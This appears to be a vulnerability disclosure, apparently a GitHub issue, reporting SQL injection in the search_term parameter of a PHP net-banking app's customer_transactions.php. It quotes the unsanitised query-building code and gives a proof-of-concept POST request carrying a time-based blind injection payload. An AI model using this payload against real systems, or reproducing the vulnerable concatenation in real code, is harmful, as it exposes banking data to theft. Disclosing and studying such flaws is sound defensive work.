net-banking/customer_transactions.php from line 39,The $_POST['search_term'] parameter is controllable, the parameter search_term can be passed through post, and the $_POST['search_term'] is not protected from sql injection, line 166 $result = $conn->query($sql0); made a sql query,resulting in sql injection
......
......
......
if (!empty($_SESSION['search_term'])) {
$sql0 .= " WHERE remarks COLLATE latin1_GENERAL_CI LIKE '%".$_SESSION['search_term']."%'";
$filter_indicator = "Remarks";
if (!empty($_SESSION['date_from']) && empty($_SESSION['date_to'])) {
$sql0 .= " AND trans_date > '".$_SESSION['date_from']." 00:00:00'";
$filter_indicator = "Remarks & Date From";
}
if (empty($_SESSION['date_from']) && !empty($_SESSION['date_to'])) {
$sql0 .= " AND trans_date < '".$_SESSION['date_to']." 23:59:59'";
$filter_indicator = "Remarks & Date To";
}
if (!empty($_SESSION['date_from']) && !empty($_SESSION['date_to'])) {
$sql0 .= " AND trans_date BETWEEN '".$_SESSION['date_from']." 00:00:00' AND '".$_SESSION['date_to']." 23:59:59'";
$filter_indicator = "Remarks, Date From & Date To";
}
}
......
......
......
<?php$result = $conn->query($sql0);
......
......
......
POC
POST /net-banking/customer_transactions.php HTTP/1.1Host: www.bank.netUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedCookie: PHPSESSID=m5fjmb3r9rvk4i56cqc22ht3c3Content-Length: 13search_term=' AND (SELECT 2581 FROM (SELECT(SLEEP(5)))bIYx)-- Ldcj
Attack results pictures
The text was updated successfully, but these errors were encountered:
Vulnerability file address
net-banking/customer_transactions.phpfrom line 39,The$_POST['search_term']parameter is controllable, the parameter search_term can be passed through post, and the$_POST['search_term']is not protected from sql injection, line 166$result = $conn->query($sql0);made a sql query,resulting in sql injectionPOC
Attack results pictures
The text was updated successfully, but these errors were encountered: